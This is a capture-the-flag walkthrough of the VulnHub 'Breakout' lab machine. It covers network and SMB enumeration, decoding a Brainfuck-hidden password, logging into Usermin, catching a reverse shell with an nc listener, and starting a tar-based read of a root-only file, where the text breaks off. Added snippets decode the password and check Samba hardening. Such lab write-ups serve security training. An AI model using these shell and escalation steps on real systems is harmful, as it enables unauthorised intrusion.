Download: https://download.vulnhub.com/empire/02-Breakout.zip
Description
Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
For hints discord Server ( https://discord.gg/7asvAhCEhe )
1: Information gathering
Discovering the target IP with netdiscover
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 50:d2:f5:7c:60:ea 2 120 Beijing Xiaomi Mobile Software Co., Ltd
192.168.1.223 08:00:27:99:43:a0 1 60 PCS Systemtechnik GmbH
192.168.1.238 52:96:66:d8:a6:d9 1 60 Unknown vendor
Port scanning
Full port scan
$ nmap -p- --min-rate 10000 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:23 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00030s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
20000/tcp open dnp
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
Version detection and --script=default scan
$ nmap -p80,139,445,10000,20000 -sV -sC 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:27 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Host script results:
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-05-26T03:27:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.40 seconds
--script=vuln scan (note that the CVE-2006-3392 hit below describes Webmin before 1.290, while the version scan reported MiniServ 1.981 and 1.830, so treat it as a finding to verify rather than a confirmed vulnerability)
$ nmap -p80,139,445,10000,20000 --script=vuln 192.168.1.223
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-25 23:29 EDT
Nmap scan report for 192.168.1.223
Host is up (0.00063s latency).
PORT STATE SERVICE
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.223
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.223:80/manual/ru/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/es/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/ko/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/pt-br/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/en/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/zh-cn/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/ja/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/fr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/tr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/de/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.223:80/manual/da/index.html
| Form id:
|_ Form action: https://www.google.com/search
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /manual/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
10000/tcp open snet-sensor-mgmt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.exploit-db.com/exploits/1997/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_ http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_sslv2-drown:
20000/tcp open dnp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
Nmap done: 1 IP address (1 host up) scanned in 52.47 seconds
Directory brute-forcing
$ gobuster -u "http://192.168.1.223/" -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.1.223/
[+] Threads : 10
[+] Wordlist : /wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : html,php,txt
[+] Timeout : 10s
=====================================================
2023/05/25 23:31:31 Starting gobuster
=====================================================
/index.html (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2023/05/25 23:32:46 Finished
=====================================================
whatweb on the two Webmin ports gives different results
$ whatweb https://192.168.1.223:10000/
https://192.168.1.223:10000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.981], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Webmin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]
$ whatweb https://192.168.1.223:20000/
https://192.168.1.223:20000/ [200 OK] Cookies[redirect,testing], Country[RESERVED][ZZ], HTML5, HTTPServer[MiniServ/1.830], HttpOnly[redirect,testing], IP[192.168.1.223], PasswordField[pass], Script, Title[Login to Usermin], UncommonHeaders[auth-type,content-security-policy,x-content-type-options,x-no-links], X-Frame-Options[SAMEORIGIN]
There is something at the bottom of the homepage; below I show part of the result.
$ curl http://192.168.1.223/
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
https://ctf.bugku.com/tool/brainfuck
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
.2uqPEfj3D<P'a-3
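As an added example (not code from the original writeup), a minimal Brainfuck interpreter in Python decodes the homepage comment offline instead of relying on the online tool; the program string is the one from the page's HTML comment, and the helper names are my own.

```python
# Added example, not part of the original writeup: a small Brainfuck
# interpreter so the HTML comment found on the homepage can be decoded offline.

def brainfuck(program: str, input_bytes: bytes = b"", tape_size: int = 30000) -> bytes:
    """Run a Brainfuck program and return everything it outputs as bytes."""
    # Pre-compute matching brackets so loop jumps are O(1) and unbalanced
    # programs are rejected before execution.
    jump = {}
    stack = []
    for pos, ch in enumerate(program):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jump[start] = pos
            jump[pos] = start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = bytearray(tape_size)   # 8-bit cells, wrap on overflow
    ptr = 0                       # data pointer
    pc = 0                        # program counter
    in_pos = 0                    # position in the optional input stream
    out = bytearray()
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("data pointer ran off the end of the tape")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("data pointer moved before the start of the tape")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            # EOF reads as 0, a common convention
            tape[ptr] = input_bytes[in_pos] if in_pos < len(input_bytes) else 0
            in_pos += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        # any other character is a comment and is skipped
        pc += 1
    return bytes(out)


# The program embedded in the HTML comment on the box's homepage.
HOMEPAGE_COMMENT = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>"
    "+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+."
    ">-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++."
)


def decode_homepage_comment() -> str:
    """Decode the homepage comment and return it as text."""
    return brainfuck(HOMEPAGE_COMMENT).decode("ascii")


if __name__ == "__main__":
    print(decode_homepage_comment())
```

The first loop seeds four cells with 10, 30, 70 and 100 and the rest of the program only nudges those cells up or down before printing, which is why the output is short while the program is long.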
Enumerating SMB users
$ enum4linux 192.168.1.223
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 26 00:15:30 2023
==========================
| Target Information |
==========================
Target ........... 192.168.1.223
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.1.223 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 192.168.1.223 |
=============================================
Looking up status of 192.168.1.223
BREAKOUT <00> - B <ACTIVE> Workstation Service
BREAKOUT <03> - B <ACTIVE> Messenger Service
BREAKOUT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
======================================
| Session Check on 192.168.1.223 |
======================================
[+] Server 192.168.1.223 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.1.223 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 192.168.1.223 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
[+] Got OS info for 192.168.1.223 from smbclient:
[+] Got OS info for 192.168.1.223 from srvinfo:
BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 192.168.1.223 |
==============================
Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.
Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.
==========================================
| Share Enumeration on 192.168.1.223 |
==========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.1.223
//192.168.1.223/print$ Mapping: DENIED, Listing: N/A
//192.168.1.223/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Password Policy Information for 192.168.1.223 |
=====================================================
[E] Dependent program "polenum.py" not present. Skipping this check. Download polenum from http://labs.portcullis.co.uk/application/polenum/
===============================
| Groups on 192.168.1.223 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 192.168.1.223 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-500 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-502 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-503 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-504 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-505 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-506 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-507 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-508 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-509 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-510 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-511 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-512 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
S-1-5-21-1683874020-4104641535-3793993001-514 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-515 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-516 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-517 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-518 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-519 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-520 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-521 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-522 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-523 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-524 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-525 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-526 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-527 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-528 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-529 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-530 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-531 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-532 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-533 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-534 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-535 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-536 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-537 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-538 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-539 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-540 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-541 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-542 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-543 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-544 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-545 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-546 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-547 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-548 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-549 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-550 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1000 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1001 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1002 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1003 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1004 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1005 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1006 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1007 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1008 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1009 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1010 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1011 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1012 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1013 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1014 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1015 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1016 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1017 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1018 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1019 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1020 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1021 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1022 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1023 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1024 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1025 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1026 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1027 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1028 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1029 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1030 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1031 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1032 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1033 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1034 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1035 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1036 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1037 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1038 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1039 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1040 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1041 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1042 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1043 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1044 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1045 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1046 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1047 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1048 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1049 *unknown*\*unknown* (8)
S-1-5-21-1683874020-4104641535-3793993001-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
==============================================
| Getting printer info for 192.168.1.223 |
==============================================
No printers returned.
enum4linux complete on Fri May 26 00:15:40 2023
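The enum4linux and nmap output above shows two things a defender would want to change on a Samba host: empty-credential sessions are accepted, and SMB signing is enabled but not required. As an added example (not code from the writeup), the Python below checks an smb.conf for those two settings; the two configurations are constructed here, but `restrict anonymous` and `server signing` are real Samba parameters.

```python
# Added example, not part of the original writeup: a checker for the two
# smb.conf weaknesses that the enumeration above observed on this box.
import configparser
from typing import Dict, List

# Constructed sample: the relevant options are left at values that permit
# null sessions and unsigned SMB.
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = Samba Server
# restrict anonymous and server signing are not set here
"""

# Constructed sample with the corrected settings.
HARDENED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = Samba Server
restrict anonymous = 2
server signing = mandatory
"""


def load_global(text: str) -> Dict[str, str]:
    """Return the [global] section of an smb.conf as a lower-cased dict."""
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, inline_comment_prefixes=(";", "#")
    )
    parser.read_string(text)
    if not parser.has_section("global"):
        return {}
    return {k.strip().lower(): v.strip() for k, v in parser.items("global")}


def check_smb_conf(text: str) -> List[str]:
    """List the weaknesses present in the given smb.conf text."""
    g = load_global(text)
    issues = []
    # restrict anonymous defaults to 0; 2 refuses anonymous connections.
    if g.get("restrict anonymous", "0") != "2":
        issues.append("restrict anonymous is not 2: empty-credential sessions may be accepted")
    # Anything other than mandatory/required leaves signing negotiable,
    # which nmap reports as 'enabled but not required'.
    if g.get("server signing", "").lower() not in {"mandatory", "required"}:
        issues.append("server signing is not mandatory: SMB signing is offered but not required")
    return issues


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, check_smb_conf(conf) or ["no issues"])
```

Run it against a real `/etc/smb/smb.conf` by reading the file into `check_smb_conf`; note that `restrict anonymous = 2` also breaks some legitimate browsing clients, so test before rolling it out.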
2: GetShell
Log in with these on port 20000
username: cyber
password: .2uqPEfj3D<P'a-3
Then get a reverse shell
ok
$ nc -lvvp 1234
listening on [any] 1234 ...
192.168.1.223: inverse host lookup failed: Unknown host
connect to [192.168.1.171] from (UNKNOWN) [192.168.1.223] 39648
bash: cannot set terminal process group (1728): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$
user_flag
cyber@breakout:~$ cat user.txt
cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
3: Privilege escalation
tar -cf creates a tar archive; the root-owned tar copy in cyber's home directory is used to archive the root-only /var/backups/.old_pass.bak so that it can be extracted and read as cyber.
cyber@breakout:~$ ls -la /var/backups/
ls -la /var/backups/
total 28
drwxr-xr-x 2 root root 4096 May 25 23:37 .
drwxr-xr-x 14 root root 4096 Oct 19 2021 ..
-rw-r--r-- 1 root root 12732 Oct 19 2021 apt.extended_states.0
